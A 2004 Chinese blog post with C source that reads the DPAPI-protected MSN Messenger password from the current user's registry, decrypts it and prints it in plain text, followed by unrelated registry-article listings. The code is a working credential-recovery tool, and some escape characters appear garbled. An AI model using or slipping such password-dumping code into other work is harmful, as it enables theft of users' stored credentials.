从注册表中还原MSNMessenger口令

原创 2004年09月13日 15:08:00
版权声明:CSDN是本Blog托管服务提供商。如本文牵涉版权问题,CSDN不承担相关责任,请版权拥有者直接与文章作者联系解决。


演示从注册表中还原MSNMessenger口令


作者:tombkeeper (t0mbkeeper_at_hotmail.com)

/* MSNMessenger的口令是经过DPAPI加密后保存在注册表中的
* 这个程序演示解码过程
* tombkeeper[0x40]nsfocus[0x2e]com
* tombkeeper[0x40]xfocus[0x2e]net
* 2004.08.11
*/

#include <Windows.h>


#pragma comment(lib, "Advapi32.lib")

#define FCHK(a)     if (!(a)) {printf(#a " failed/n"); return 0;}

typedef struct _CRYPTOAPI_BLOB {
    DWORD cbData;
    BYTE* pbData;
} DATA_BLOB;

typedef struct _CRYPTPROTECT_PROMPTSTRUCT {
    DWORD cbSize;
    DWORD dwPromptFlags;
    HWND hwndApp;
    LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;

typedef BOOL (WINAPI *PCryptUnprotectData)(
    DATA_BLOB* pDataIn,
    LPWSTR* ppszDataDescr,
    DATA_BLOB* pOptionalEntropy,
    PVOID pvReserved,
    CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
    DWORD dwFlags,
    DATA_BLOB* pDataOut
);

PCryptUnprotectData CryptUnprotectData = NULL;


int main(void)
{
    int ret;
    HMODULE hNtdll;

    HKEY hKey;
    DWORD dwType;
    char Data[0x100] = {0};
    DWORD dwSize;

    DATA_BLOB DataIn;
    DATA_BLOB DataOut;

    ret = RegOpenKeyEx
    (
        HKEY_CURRENT_USER,
        "Software//Microsoft//MSNMessenger",
        0,
        KEY_READ,
        &hKey
    );
    if( ret != ERROR_SUCCESS ) return 1;

    ret = RegQueryValueEx
    (
        hKey,
        "Password.NET Messenger Service",
        NULL,
        &dwType,
        Data,
        &dwSize
    );
    if( ret != ERROR_SUCCESS ) return 1;

    FCHK ((hNtdll = LoadLibrary ("Crypt32.dll")) != NULL);
    FCHK ((CryptUnprotectData = (PCryptUnprotectData)
           GetProcAddress (hNtdll, "CryptUnprotectData")) != NULL);

    DataIn.pbData = Data + 2;   //口令密文从第二位开始
    DataIn.cbData = dwSize-2;

    CryptUnprotectData
    (
        &DataIn,
        NULL,
        NULL,
        NULL,
        NULL,
        1,
        &DataOut
    );

    base64_decode (DataOut.pbData, Data, strlen(DataOut.pbData));
    printf ( "MSN Password: %s/n", Data);
    return 0;
}

//copied from GNU libc - libc/resolv/base64.c
int base64_decode (char const *src, char *target, size_t targsize)
{
    static const char Base64[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    static const char Pad64 = '=';

    int tarindex, state, ch;
    char *pos;

    state = 0;
    tarindex = 0;

    while ((ch = *src++) != '/0')
    {
        if (isspace (ch))         /* Skip whitespace anywhere. */
            continue;

        if (ch == Pad64)
            break;

        pos = strchr (Base64, ch);
        if (pos == 0)             /* A non-base64 character. */
            return (-1);

        switch (state)
        {
            case 0:
            if (target)
            {
                if ((size_t) tarindex >= targsize)
                    return (-1);
                target[tarindex] = (pos - Base64) << 2;
            }
            state = 1;
            break;
            case 1:
            if (target)
            {
                if ((size_t) tarindex + 1 >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64) >> 4;
                target[tarindex + 1] = ((pos - Base64) & 0x0f) << 4;
            }
            tarindex++;
            state = 2;
            break;
            case 2:
            if (target)
            {
                if ((size_t) tarindex + 1 >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64) >> 2;
                target[tarindex + 1] = ((pos - Base64) & 0x03) << 6;
            }
            tarindex++;
            state = 3;
            break;
            case 3:
            if (target)
            {
                if ((size_t) tarindex >= targsize)
                    return (-1);
                target[tarindex] |= (pos - Base64);
            }
            tarindex++;
            state = 0;
            break;
            default:
            abort ();
        }
    }

  /*
   * We are done decoding Base-64 chars.  Let's see if we ended
   * on a byte boundary, and/or with erroneous trailing characters.
   */

    if (ch == Pad64)
    {                           /* We got a pad char. */
        ch = *src++;              /* Skip it, get next. */
        switch (state)
        {
            case 0:         /* Invalid = in first position */
            case 1:         /* Invalid = in second position */
                return (-1);

            case 2:         /* Valid, means one byte of info */
             /* Skip any number of spaces. */
            for ((void) NULL; ch != '/0'; ch = *src++)
                if (!isspace (ch))
                    break;
             /* Make sure there is another trailing = sign. */
            if (ch != Pad64)
                return (-1);
            ch = *src++;          /* Skip the = */
            /* Fall through to "single trailing =" case. */
            /* FALLTHROUGH */

            case 3:         /* Valid, means two bytes of info */
            /*
             * We know this char is an =.  Is there anything but
             * whitespace after it?
            */
            for ((void) NULL; ch != '/0'; ch = *src++)
                if (!isspace (ch))
                    return (-1);

            /*
             * Now make sure for cases 2 and 3 that the "extra"
             * bits that slopped past the last full byte were
             * zeros.  If we don't check them, they become a
             * subliminal channel.
             */
            if (target && target[tarindex] != 0)
                return (-1);
        }
    }
    else
    {
        /*
         * We ended by seeing the end of the string.  Make sure we
         * have no partial bytes lying around.
         */
        if (state != 0)
            return (-1);
    }

    return (tarindex);
}

演示从注册表中还原MSNMessenger口令

演示从注册表中还原MSNMessenger口令作者:tombkeeper (t0mbkeeper_at_hotmail.com)/* MSNMessenger的口令是经过DPAPI加密后保存在注册表中...
  • adubbser
  • adubbser
  • 2004-09-03 20:00:00
  • 529

注册表的备份和恢复方法

先来讲解一下注册表备份方法,其实注册表不必备份,因为系统默认每次启动都会为注册表备份一次这个默认的启动项目在注册表HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsC...
  • qionghaizi
  • qionghaizi
  • 2005-04-30 02:09:00
  • 1031

win7库还原注册表

  • 2010年01月08日 10:08
  • 2KB
  • 下载

WINCE恢复默认HIVE注册表的方法

  当Wince使用了HIVE注册表后,每次用户的注册表改动将得到保存,但是在某些应用场合需要将注册表还原成为出厂的默认设置,通常要求能够在AP中通过点击一个按钮来实现这种clean boot。使用我...
  • fredzeng
  • fredzeng
  • 2006-08-23 10:44:00
  • 6089

借助winPE手工清除Deep Freeze冰点还原

source: click here   故障表现:系统托盘无冰点图标显示,用Shife+Ctrl+Alt+F6热键无法呼出冰点设置窗口,X:/Program Files/Faronics...
  • xcntime
  • xcntime
  • 2015-01-13 19:37:32
  • 829

win7下快速进入当前文件下的命令行以及如何把文件导入注册表

按住shift键,然后点击鼠标右键就出现‘在此处打开命令窗口’,点击进入即可。 但是有时候可能没有这一项,没关系,可以通过注册表导入,步骤如下: 1.  新建记事本,输入以下内容: Windo...
  • fangfanggaogao
  • fangfanggaogao
  • 2017-02-16 13:55:26
  • 470

如何在注册表中彻底删除软件的残余

  • 2015年06月02日 10:51
  • 613KB
  • 下载

淘口令解析软件

  • 2017年10月01日 10:58
  • 337KB
  • 下载

MsnMessenger

  • 2006年02月23日 09:05
  • 1.71MB
  • 下载

BE Learing --4 安装remote agent

Technorati 标签: BE,Backup Exec,Veritas,备份 1 安装remote agent 1.1 安装 BE的帮助说的让人头晕。 简单的办法就是在安装好的BE机器的安...
  • sipsir
  • sipsir
  • 2009-05-24 09:10:00
  • 1366
收藏助手
不良信息举报
您举报文章:从注册表中还原MSNMessenger口令
举报原因:
原因补充:

(最多只允许输入30个字)